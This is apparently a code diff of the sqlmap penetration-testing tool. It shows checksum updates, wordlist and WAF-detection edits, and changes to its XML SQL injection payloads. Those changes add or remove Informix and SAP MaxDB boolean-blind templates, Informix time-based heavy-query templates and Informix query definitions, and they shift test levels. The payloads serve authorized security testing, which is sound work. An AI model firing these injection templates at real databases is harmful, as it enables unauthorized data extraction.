2d39688ec1b871005b520b6f1ed97ba6 lib/takeover/metasploit.py
1d064463302b85b2241263ea48a83837 lib/takeover/metasploit.py
7083825564c051a7265cfdd1a5e6629c lib/takeover/registry.py
7d6cd7bdfc8f4bc4e8aed60c84cdf87f lib/takeover/udf.py
d9bdcc17091374c53ad2eea7fd72a909 lib/takeover/web.py
f6e3084abd506925a8be3d1c0a6d058c lib/takeover/web.py
9af83a62de360184f1c14e69b8a95cfe lib/takeover/xp_cmdshell.py
27d41f38de7348600309e1cb6741fb2e lib/techniques/blind/inference.py
927092550c89f8c3c5caad2b14af0830 lib/techniques/blind/inference.py
cc9c82cfffd8ee9b25ba3af6284f057e lib/techniques/blind/__init__.py
cc9c82cfffd8ee9b25ba3af6284f057e lib/techniques/brute/__init__.py
d36effffe64e63ef9b3be490f850e2cc lib/techniques/brute/use.py
@@ -99,9 +100,9 @@ cc9c82cfffd8ee9b25ba3af6284f057e lib/techniques/__init__.py
cc9c82cfffd8ee9b25ba3af6284f057e lib/techniques/union/__init__.py
f5d6884cdeed28281187c111d3e49e3b lib/techniques/union/test.py
12ce1bb7ee5f1f23f58be12fe9fa8472 lib/techniques/union/use.py
26c1babc6289fac9056f8b21d10f3bb1 lib/utils/api.py
2dfc03a7322c46deb2e5353a7fd4be5e lib/utils/api.py
8cdc8c1e663c3b92a756fb7b02cc3c02 lib/utils/crawler.py
e30011943692aa2fe7c1185974112bc0 lib/utils/deps.py
393f8fd1684308213e1d2e6a9d4258c2 lib/utils/deps.py
4dfd3a95e73e806f62372d63bc82511f lib/utils/getch.py
b1e83fc549334fae8f60552dcdad28cb lib/utils/hashdb.py
0330607242d4f704ae6d7bba5f52ccae lib/utils/hash.py
@@ -114,7 +115,7 @@ cc9b0f68dd58a2576a5a454b7f5f6b9c lib/utils/search.py
4a0374ac0bc9d726446f04c77fbb5697 lib/utils/sqlalchemy.py
8013e4a4c62ad916452434ea3c352a7a lib/utils/timeout.py
e6fa0e76367a77015da113811dfd9712 lib/utils/versioncheck.py
adafdb28095ba2d03322fee2aae4548f lib/utils/xrange.py
4759e0bb8931d461dfcad410ca05fc5d lib/utils/xrange.py
988100b4a1cd3b07acfd8b6ec692aed5 plugins/dbms/access/connector.py
27a5ae5611836b073dd53b21435f0979 plugins/dbms/access/enumeration.py
438090ab8ca63d9c23831a5ffbef74d9 plugins/dbms/access/filesystem.py
@@ -143,13 +144,6 @@ c9d59b7c60aa0f0b23f920f932547e40 plugins/dbms/hsqldb/fingerprint.py
d278ad5f1c13fea871ed1120942244d5 plugins/dbms/hsqldb/__init__.py
d781720e15c23b662bae3098ed470756 plugins/dbms/hsqldb/syntax.py
2f957281cfe80396f73a3dccc0cb6d45 plugins/dbms/hsqldb/takeover.py
78917f19ea0750a665094d7dd7778d0c plugins/dbms/informix/connector.py
d251aecff7544f79f78385386bb7fa35 plugins/dbms/informix/enumeration.py
e8f0f28da98020dce27970a50e10a23b plugins/dbms/informix/filesystem.py
89540595a6011b47629c68d11a5e4533 plugins/dbms/informix/fingerprint.py
99a77ad7aa7ca4a4b5981f2fa0d9c616 plugins/dbms/informix/__init__.py
8300ca02ecf00d3b00d78ecde8a86c09 plugins/dbms/informix/syntax.py
5f130772d2295ae61140acba894eaceb plugins/dbms/informix/takeover.py
cc9c82cfffd8ee9b25ba3af6284f057e plugins/dbms/__init__.py
4c8667e8af763ddf82ee314c6681d4e1 plugins/dbms/maxdb/connector.py
075fd66b8bbabed18aeb304c6c0ef2a2 plugins/dbms/maxdb/enumeration.py
@@ -168,7 +162,7 @@ f3da9f5298dac5d1f468828c07c81f70 plugins/dbms/mssqlserver/takeover.py
d8cd212ba7be09483af3f32256b71f05 plugins/dbms/mysql/connector.py
d251aecff7544f79f78385386bb7fa35 plugins/dbms/mysql/enumeration.py
a970f90c91ebd3a7e22955424fe5414e plugins/dbms/mysql/filesystem.py
edc62bbf269d053ccc68b4cdfebdf12b plugins/dbms/mysql/fingerprint.py
eed5093257e65adfae7bb56c5a6d3eb0 plugins/dbms/mysql/fingerprint.py
a4535cb3873ada344e6e61dbe1a546d3 plugins/dbms/mysql/__init__.py
4ad721acc40a964fc67154dd4683870e plugins/dbms/mysql/syntax.py
aa88b5d6198cd31d9ab2be664da9a265 plugins/dbms/mysql/takeover.py
@@ -182,7 +176,7 @@ cac6bd84d44ac929da6800719279875b plugins/dbms/oracle/takeover.py
6c54ca5c9efad3e437467f9fe44435d6 plugins/dbms/postgresql/connector.py
419dd50e6688fef760fec4f71430fb29 plugins/dbms/postgresql/enumeration.py
9756fc02fc84719c3e330fcc7914bf17 plugins/dbms/postgresql/filesystem.py
5bd67a898b9671c78b00b9299674e6d7 plugins/dbms/postgresql/fingerprint.py
28bce42dac3ee8efccc78c7a58b170b6 plugins/dbms/postgresql/fingerprint.py
0e7d17abf68f1dd770e969c84878d246 plugins/dbms/postgresql/__init__.py
8711e7c1265a5e651c9aadca7db40cd5 plugins/dbms/postgresql/syntax.py
50d8070e687e5806058a121311a36385 plugins/dbms/postgresql/takeover.py
@@ -202,8 +196,8 @@ d0c7cc8ec2aa716b2e5cd3b5ab805c3a plugins/dbms/sybase/__init__.py
7a1c6cb238b5b464e1e9641469e6e503 plugins/dbms/sybase/takeover.py
62faa58e5aace4b6a6d562788685186f plugins/generic/connector.py
cdbf6eec4a94f830deb7dbab1c1a2935 plugins/generic/custom.py
f27f76bfd2ed9ce384dcd43fb7e10226 plugins/generic/databases.py
1177bbad4e77a2ca85e0054569e03d38 plugins/generic/entries.py
977bbd1bced67c2c4aa74d12c77ac165 plugins/generic/databases.py
f2394baa3746188184be2144025eeffc plugins/generic/entries.py
e335b868f5fb1154c9f72143d602915d plugins/generic/enumeration.py
3e673ef4e6592f52a11d88e61fe4dc2b plugins/generic/filesystem.py
5637c508ca6348f29c2b100a3e80dddc plugins/generic/fingerprint.py
@@ -212,7 +206,7 @@ cc9c82cfffd8ee9b25ba3af6284f057e plugins/generic/__init__.py
7b3e044a7fca497278d79883697089b7 plugins/generic/search.py
73f8d047dbbcff307d62357836e382e6 plugins/generic/syntax.py
da3ebc20998af02e3d952d0417a67792 plugins/generic/takeover.py
d35f994664fb7a7fcee656633dfb31ed plugins/generic/users.py
4b5a6e2aec8e240fc43916d9dde27b14 plugins/generic/users.py
cc9c82cfffd8ee9b25ba3af6284f057e plugins/__init__.py
b04db3e861edde1f9dd0a3850d5b96c8 shell/backdoor.asp_
158bfa168128393dde8d6ed11fe9a1b8 shell/backdoor.aspx_
@@ -224,7 +218,7 @@ c3cc8b7727161e64ab59f312c33b541a shell/stager.aspx_
1f7f125f30e0e800beb21e2ebbab18e1 shell/stager.jsp_
01e3505e796edf19aad6a996101c81c9 shell/stager.php_
56702e95555adee718b6a11ee7098fd4 sqlmapapi.py
4b8d19a39402dc7f8a341608a9625aa1 sqlmap.py
7e80fcefc56426ed780c48556b70a1f0 sqlmap.py
1316deb997418507e76221c84ec99946 tamper/apostrophemask.py
a6efe8f914c769c52afec703bd73609f tamper/apostrophenullencode.py
b1c56983919b69f4f6f0e7929c881e7a tamper/appendnullbyte.py
@@ -241,7 +235,6 @@ e2aca0ea57afc24dd154472034dc9c8c tamper/commalessmid.py
11bb0652668bb6624494567fd92933b3 tamper/escapequotes.py
731c25dd33fca28514930d4409daaaa3 tamper/greatest.py
1becabc90d81c70fd24b54cae03a3702 tamper/halfversionedmorekeywords.py
61add9dce3c0c9035901db87fa969c89 tamper/htmlencode.py
17313c5a68aa44325616e0e38869b98e tamper/ifnull2ifisnull.py
dd71bbc7f76ef55a2c9c16645347ead8 tamper/informationschemacomment.py
cc9c82cfffd8ee9b25ba3af6284f057e tamper/__init__.py
@@ -318,7 +311,7 @@ ee25f2a03587e2c283eab0b36c9e5783 thirdparty/chardet/sbcsgroupprober.py
c9349824f2647962175d321cc0c52134 thirdparty/chardet/sjisprober.py
bcae4c645a737d3f0e7c96a66528ca4a thirdparty/chardet/universaldetector.py
6f8b3e25472c02fb45a75215a175991f thirdparty/chardet/utf8prober.py
658da0466b798cc70f48f35fe49b7813 thirdparty/clientform/clientform.py
b678dcd25ecb1533ffe2493b6e711bb1 thirdparty/clientform/clientform.py
722281d87fb13ec22555480f8f4c715b thirdparty/clientform/__init__.py
0b625ccefa6b066f79d3cbb3639267e6 thirdparty/colorama/ansi.py
e52252bb81ce1a14b7245b53af33e75f thirdparty/colorama/ansitowin32.py
@@ -336,7 +329,7 @@ e0c6a936506bffeed53ce106ec15942d thirdparty/keepalive/keepalive.py
d41d8cd98f00b204e9800998ecf8427e thirdparty/magic/__init__.py
49f0d123e044dd32a452e2fe51f1a9c3 thirdparty/magic/magic.py
d41d8cd98f00b204e9800998ecf8427e thirdparty/multipart/__init__.py
03c8abc17b228e59bcfda1f11a9137e0 thirdparty/multipart/multipartpost.py
fd52df5770ee286a7c186fdd2ccc4e0c thirdparty/multipart/multipartpost.py
3e502b04f3849afbb7f0e13b5fd2b5c1 thirdparty/odict/__init__.py
127fe54fdb9b13fdac93c8fc9c9cad5e thirdparty/odict/odict.py
08801ea0ba9ae22885275ef65d3ee9dc thirdparty/oset/_abc.py
@@ -358,22 +351,22 @@ ea649aae139d8551af513769dd913dbf thirdparty/termcolor/termcolor.py
1501fa7150239b18acc0f4a9db2ebc0d udf/mysql/linux/64/lib_mysqludf_sys.so_
7824059e8fc87c4a565e774676e2f1eb udf/mysql/windows/32/lib_mysqludf_sys.dll_
7fed5b8e99e36ce255c64527ec61a995 udf/mysql/windows/64/lib_mysqludf_sys.dll_
0ee1310d4e2a4cc5a7295df01a3a78bf udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_
c7d9e1fcac5f047edf17d79a825fb64b udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_
ec41a080f4570c3866b9a7219f7623c4 udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_
337e2b84dfb089d1ba78323ab2fd21bd udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_
e3234ad91b65c476e69743b196ea8394 udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_
2e39682ab7f7f9d6bcce6a3f9dac576b udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_
b17ade3fe472b00f6d4d655f0d1036b2 udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_
3dfc42ea62f5db4196a1b736c603ef0f udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_
fe297bfe5e27e7f99d64b2d6baa766fe udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_
d7ce763983f5ef4cdae07480c7e16c36 udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_
f9e5d7a8f1fbd8df80d07f72ada0251b udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_
10a20abaf98ff25527702c7e37187427 udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_
0b5158292758f4a67cb1bdfcefcd4ef3 udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_
1d8eb0e3d38f1265ea1bef7f9ec60230 udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_
1222dac08cf53e31e74e350a2c17452f udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_
27761c5e046da59f1f1e11f6d194e38a udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_
6b4dc184e545d7bd5e7c31590647471d udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_
8c5573d1da59024c47d00cc8492a92df udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_
b9930f6bf43780fff469bc40e20599c3 udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_
6930b6d67f4d52b5c1663ac2d8460576 udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_
5c177ee2cffad6133e99a24d1f913660 udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_
4d0c06a51c5b03b41ad4df33a304d282 udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_
db0b1fe75fd9db96c1fc6ab42ae76d70 udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_
df8524a627568864e1de516bbe5718ef udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_
3c3e3b72fa5b5860108a0350a0604ba2 udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_
b10e351f5d8c07fdf08dc3f44b00c01c udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_
7714b28ee7669f60a2321f1b4ce6bba8 udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_
9911482642131fd3be6a03a28294d24a udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_
fed2ed6df3f809b1019e9a0ee102799d udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_
d5d004b396ca5b14afe03a294d42c475 udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_
5b79d7f667a0e1e4a70a5ceb70107cbe udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_
b396f050d36e82baf2724f140165fbd5 udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_
a6b9c964f7c7d7012f8f434bbd84a041 udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_
d9006810684baf01ea33281d21522519 udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_
ca3ab78d6ed53b7f2c07ed2530d47efd udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_
@@ -407,7 +400,7 @@ cc9c82cfffd8ee9b25ba3af6284f057e waf/__init__.py
32516985d3cb0aeeb1bf28062820b045 waf/kona.py
c3de612a7960b08e1e7f97aa05b58df1 waf/modsecurity.py
dc79a2e675d17df4cba1f8b839cbc11b waf/netcontinuum.py
8d3230fa3c6a7e41dc85dd04c95db044 waf/netscaler.py
c218fd16246dfbbd0485cb3456182c71 waf/netscaler.py
4e05b8169e53edd36a6269e937958744 waf/newdefend.py
80eb59b4dcb62de8c97bd1bebbfb3f80 waf/nsfocus.py
477c3b6b31e8eb1fe836bd5a24c9fab2 waf/paloalto.py
@@ -433,7 +426,6 @@ b5ea5375df444e0240f1ee0e2a8e52fb waf/trafficshield.py
7a723ce2f1b82d7297a2ab025d5ca0be waf/webappsecure.py
75e51fea7f206e8faa2f743e44e58383 waf/webknight.py
3bcac085dcd9ed26b50a2320e418e9f3 waf/yundun.py
2a57f322f0b6e7b11b8df0909816a34f waf/yunsuo.py
2d53fdaca0d7b42edad5192661248d76 xml/banner/cookie.xml
37603bc0905af0c65480a2ca959990ec xml/banner/generic.xml
d8925c034263bf1b83e7d8e1c78eec57 xml/banner/mssql.xml
@@ -447,11 +439,11 @@ d989813ee377252bca2103cea524c06b xml/banner/sharepoint.xml
2394458d582a636c52342cff33ae3035 xml/banner/x-powered-by.xml
fb93505ef0ab3b4a20900f3e5625260d xml/boundaries.xml
535d625cff8418bdc086ab4e1bbf5135 xml/errors.xml
a279656ea3fcb85c727249b02f828383 xml/livetests.xml
4b266898af8b7f380db910511de24ec4 xml/payloads/boolean_blind.xml
2e13b9e0a51768969d4ccc02cf62ea70 xml/livetests.xml
18b2c7e5738a3be72d759af96a9aaddf xml/payloads/boolean_blind.xml
103a4c9b12c582b24a3fac8147a9c8d4 xml/payloads/error_based.xml
06b1a210b190d52477a9d492443725b5 xml/payloads/inline_query.xml
3194e2688a7576e1f877d5b137f7c260 xml/payloads/stacked_queries.xml
c2d8dd03db5a663e79eabb4495dd0723 xml/payloads/time_blind.xml
ac649aff0e7db413e4937e446e398736 xml/payloads/union_query.xml
1587a02322a96ac48973e782d6fedf73 xml/queries.xml
96adb9bfbab867d221974d3ddb303cb6 xml/payloads/stacked_queries.xml
c8b152ecebf04ec997e52c6c78cbd488 xml/payloads/time_blind.xml
033b39025e8ee0f302935f6db3a39e77 xml/payloads/union_query.xml
313c0e1cc42de27a29c0e0ac67fee71d xml/queries.xml

View File

@@ -471,7 +471,6 @@ settingsid
lname
sale_date
module_addr
flag
# spanish
usuario

View File

@@ -1615,7 +1615,6 @@ SPACE
geo_Sea
DATA_ORG
Contributor
flag
# Various Joomla tables
jos_vm_product_download

File diff suppressed because it is too large

View File

@@ -18,7 +18,7 @@ def detect(get_page):
for vector in WAF_ATTACK_VECTORS:
_, headers, _ = get_page(get=vector)
retval = re.search(r"\Aclose", headers.get("Cneonction", "") or headers.get("nnCoection", ""), re.I) is not None
retval |= re.search(r"\A(ns_af=|citrix_ns_id|NSC_)", headers.get(HTTP_HEADER.SET_COOKIE, ""), re.I) is not None
retval = re.search(r"\A(ns_af=|citrix_ns_id|NSC_)", headers.get(HTTP_HEADER.SET_COOKIE, ""), re.I) is not None
retval |= re.search(r"\ANS-CACHE", headers.get(HTTP_HEADER.VIA, ""), re.I) is not None
if retval:
break

View File

@@ -1,25 +0,0 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import re
from lib.core.enums import HTTP_HEADER
from lib.core.settings import WAF_ATTACK_VECTORS
__product__ = "Yunsuo Web Application Firewall (Yunsuo)"
def detect(get_page):
retval = False
for vector in WAF_ATTACK_VECTORS:
page, headers, _ = get_page(get=vector)
retval = re.search(r"<img class=\"yunsuologo\"", page, re.I) is not None
retval |= re.search(r"yunsuo_session", headers.get(HTTP_HEADER.SET_COOKIE, ""), re.I) is not None
if retval:
break
return retval
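
Detection scripts like the one above only need a get_page() callback returning (page, headers, code), so they can be exercised against canned responses. The sketch below assumes a stubbed callback and replaces sqlmap's WAF_ATTACK_VECTORS and HTTP_HEADER.SET_COOKIE constants with plain values; it is not the project's test harness.

# Illustrative sketch only -- exercising a detect() routine like the one
# above with a stubbed get_page() callback instead of live traffic.
import re

def detect(get_page, attack_vectors=("?id=1 AND 1=1",)):
    retval = False
    for vector in attack_vectors:
        page, headers, _ = get_page(get=vector)
        retval = re.search(r"<img class=\"yunsuologo\"", page or "", re.I) is not None
        retval |= re.search(r"yunsuo_session", headers.get("Set-Cookie", ""), re.I) is not None
        if retval:
            break
    return retval

def fake_get_page(get=None):
    # Pretend the target answers with a Yunsuo block page and session cookie.
    return "<html><img class=\"yunsuologo\"/></html>", {"Set-Cookie": "yunsuo_session=abc"}, 200

print(detect(fake_get_page))  # True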

File diff suppressed because it is too large

View File

@@ -841,44 +841,6 @@ Tag: <test>
</details>
</test>
<test>
<title>Informix boolean-based blind - Parameter replace</title>
<stype>1</stype>
<level>3</level>
<risk>1</risk>
<clause>1,3</clause>
<where>3</where>
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/0 END) FROM SYSMASTER:SYSDUAL)</vector>
<request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/0 END) FROM SYSMASTER:SYSDUAL)</payload>
</request>
<response>
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/0 END) FROM SYSMASTER:SYSDUAL)</comparison>
</response>
<details>
<dbms>Informix</dbms>
</details>
</test>
<test>
<title>Informix boolean-based blind - Parameter replace (original value)</title>
<stype>1</stype>
<level>4</level>
<risk>1</risk>
<clause>1,3</clause>
<where>3</where>
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM] END) FROM SYSMASTER:SYSDUAL)</vector>
<request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM] END) FROM SYSMASTER:SYSDUAL)</payload>
</request>
<response>
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM] END) FROM SYSMASTER:SYSDUAL)</comparison>
</response>
<details>
<dbms>Informix</dbms>
</details>
</test>
<test>
<title>Microsoft Access boolean-based blind - Parameter replace</title>
<stype>1</stype>
@@ -917,6 +879,44 @@ Tag: <test>
</details>
</test>
<test>
<title>SAP MaxDB boolean-based blind - Parameter replace</title>
<stype>1</stype>
<level>3</level>
<risk>1</risk>
<clause>1,3</clause>
<where>3</where>
<vector>(CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE NULL END)</vector>
<request>
<payload>(CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE NULL END)</payload>
</request>
<response>
<comparison>(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE NULL END)</comparison>
</response>
<details>
<dbms>SAP MaxDB</dbms>
</details>
</test>
<test>
<title>SAP MaxDB boolean-based blind - Parameter replace (original value)</title>
<stype>1</stype>
<level>4</level>
<risk>1</risk>
<clause>1,3</clause>
<where>3</where>
<vector>(CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END)</vector>
<request>
<payload>(CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END)</payload>
</request>
<response>
<comparison>(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE NULL END)</comparison>
</response>
<details>
<dbms>SAP MaxDB</dbms>
</details>
</test>
<!-- Works in MySQL, Oracle, etc. -->
<test>
<title>Boolean-based blind - Parameter replace (DUAL)</title>
@@ -951,40 +951,6 @@ Tag: <test>
</test>
<!-- End of boolean-based blind tests - Parameter replace -->
<!-- Works in SAP MaxDB, Informix, etc. -->
<test>
<title>Boolean-based blind - Parameter replace (CASE)</title>
<stype>1</stype>
<level>2</level>
<risk>1</risk>
<clause>1,3</clause>
<where>3</where>
<vector>(CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE NULL END)</vector>
<request>
<payload>(CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE NULL END)</payload>
</request>
<response>
<comparison>(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE NULL END)</comparison>
</response>
</test>
<test>
<title>Boolean-based blind - Parameter replace (CASE) (original value)</title>
<stype>1</stype>
<level>3</level>
<risk>1</risk>
<clause>1,3</clause>
<where>3</where>
<vector>(CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END)</vector>
<request>
<payload>(CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END)</payload>
</request>
<response>
<comparison>(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE NULL END)</comparison>
</response>
</test>
<!-- End of boolean-based blind tests - Parameter replace -->
<!-- Boolean-based blind tests - ORDER BY, GROUP BY clause -->
<test>
<title>MySQL &gt;= 5.0 boolean-based blind - ORDER BY, GROUP BY clause</title>

View File

@@ -5,7 +5,7 @@
<test>
<title>MySQL &gt; 5.0.11 stacked queries (comment)</title>
<stype>4</stype>
<level>2</level>
<level>1</level>
<risk>1</risk>
<clause>0</clause>
<where>1</where>
@@ -26,7 +26,7 @@
<test>
<title>MySQL &gt; 5.0.11 stacked queries</title>
<stype>4</stype>
<level>3</level>
<level>2</level>
<risk>1</risk>
<clause>0</clause>
<where>1</where>
@@ -46,7 +46,7 @@
<test>
<title>MySQL &gt; 5.0.11 stacked queries (query SLEEP - comment)</title>
<stype>4</stype>
<level>3</level>
<level>2</level>
<risk>1</risk>
<clause>0</clause>
<where>1</where>
@@ -67,7 +67,7 @@
<test>
<title>MySQL &gt; 5.0.11 stacked queries (query SLEEP)</title>
<stype>4</stype>
<level>4</level>
<level>3</level>
<risk>1</risk>
<clause>0</clause>
<where>1</where>
@@ -87,7 +87,7 @@
<test>
<title>MySQL &lt; 5.0.12 stacked queries (heavy query - comment)</title>
<stype>4</stype>
<level>3</level>
<level>2</level>
<risk>2</risk>
<clause>0</clause>
<where>1</where>
@@ -107,7 +107,7 @@
<test>
<title>MySQL &lt; 5.0.12 stacked queries (heavy query)</title>
<stype>4</stype>
<level>5</level>
<level>4</level>
<risk>2</risk>
<clause>0</clause>
<where>1</where>

View File

@@ -570,7 +570,7 @@
</test>
<test>
<title>Microsoft SQL Server/Sybase time-based blind (IF)</title>
<title>Microsoft SQL Server/Sybase time-based blind</title>
<stype>5</stype>
<level>1</level>
<risk>1</risk>
@@ -591,7 +591,7 @@
</test>
<test>
<title>Microsoft SQL Server/Sybase time-based blind (IF - comment)</title>
<title>Microsoft SQL Server/Sybase time-based blind (comment)</title>
<stype>5</stype>
<level>4</level>
<risk>1</risk>
@@ -1337,85 +1337,7 @@
<dbms_version>&gt; 2.0</dbms_version>
</details>
</test>
<test>
<title>Informix AND time-based blind (heavy query)</title>
<stype>5</stype>
<level>2</level>
<risk>2</risk>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END)</vector>
<request>
<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)</payload>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>Informix</dbms>
</details>
</test>
<test>
<title>Informix OR time-based blind (heavy query)</title>
<stype>5</stype>
<level>2</level>
<risk>3</risk>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END)</vector>
<request>
<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)</payload>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>Informix</dbms>
</details>
</test>
<test>
<title>Informix AND time-based blind (heavy query - comment)</title>
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END)</vector>
<request>
<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)</payload>
<comment>--</comment>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>Informix</dbms>
</details>
</test>
<test>
<title>Informix OR time-based blind (heavy query - comment)</title>
<stype>5</stype>
<level>5</level>
<risk>3</risk>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END)</vector>
<request>
<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)</payload>
<comment>--</comment>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>Informix</dbms>
</details>
</test>
<!-- TODO: if possible, add payload for Microsoft Access -->
<!-- End of time-based boolean tests -->
<!-- Time-based boolean tests - Numerous clauses -->
@@ -1775,7 +1697,7 @@
<dbms>IBM DB2</dbms>
</details>
</test>
<!-- Untested -->
<test>
<title>HSQLDB &gt;= 1.7.2 time-based blind - Parameter replace (heavy query)</title>
@@ -1816,25 +1738,6 @@
<dbms_version>&gt; 2.0</dbms_version>
</details>
</test>
<test>
<title>Informix time-based blind - Parameter replace (heavy query)</title>
<stype>5</stype>
<level>4</level>
<risk>2</risk>
<clause>1,2,3,9</clause>
<where>3</where>
<vector>(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END)</vector>
<request>
<payload>(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)</payload>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>Informix</dbms>
</details>
</test>
<!-- End of time-based boolean tests - Parameter replace -->
<!-- Time-based boolean tests - ORDER BY, GROUP BY clause -->
@@ -2035,6 +1938,6 @@
<dbms_version>&gt; 2.0</dbms_version>
</details>
</test>
<!-- TODO: if possible, add payload for Microsoft Access -->
<!-- End of time-based boolean tests - ORDER BY, GROUP BY clause -->
</root>

View File

@@ -346,7 +346,7 @@
<test>
<title>MySQL UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom)</title>
<stype>6</stype>
<level>2</level>
<level>1</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
@@ -368,7 +368,7 @@
<test>
<title>MySQL UNION query (NULL) - [COLSTART] to [COLSTOP] columns (custom)</title>
<stype>6</stype>
<level>2</level>
<level>1</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
@@ -412,7 +412,7 @@
<test>
<title>MySQL UNION query ([CHAR]) - 1 to 10 columns</title>
<stype>6</stype>
<level>2</level>
<level>1</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
@@ -434,7 +434,7 @@
<test>
<title>MySQL UNION query (NULL) - 1 to 10 columns</title>
<stype>6</stype>
<level>2</level>
<level>1</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>

View File

@@ -714,67 +714,4 @@
<inband query="SELECT table_schem,table_name FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE %s" condition="column_name" condition2="table_schem" condition3="table_name"/>
</search_column>
</dbms>
<!-- Informix -->
<!-- https://www.ibm.com/support/knowledgecenter/SSGU8G_11.70.0/com.ibm.sqlr.doc/ids_sqr_072.htm -->
<!-- https://www.ibm.com/support/knowledgecenter/SSGU8G_12.1.0/com.ibm.sec.doc/ids_am_041.htm -->
<dbms value="Informix">
<cast query="RTRIM(TO_CHAR(%s))"/>
<length query="CHAR_LENGTH(RTRIM(%s))"/>
<isnull query="NVL(%s,' ')"/>
<delimiter query="||"/>
<limit query="SELECT SKIP %d LIMIT 1"/>
<limitregexp query="\s+SKIP\s+([\d]+)\s*LIMIT\s*([\d]+)"/>
<limitgroupstart query="1"/>
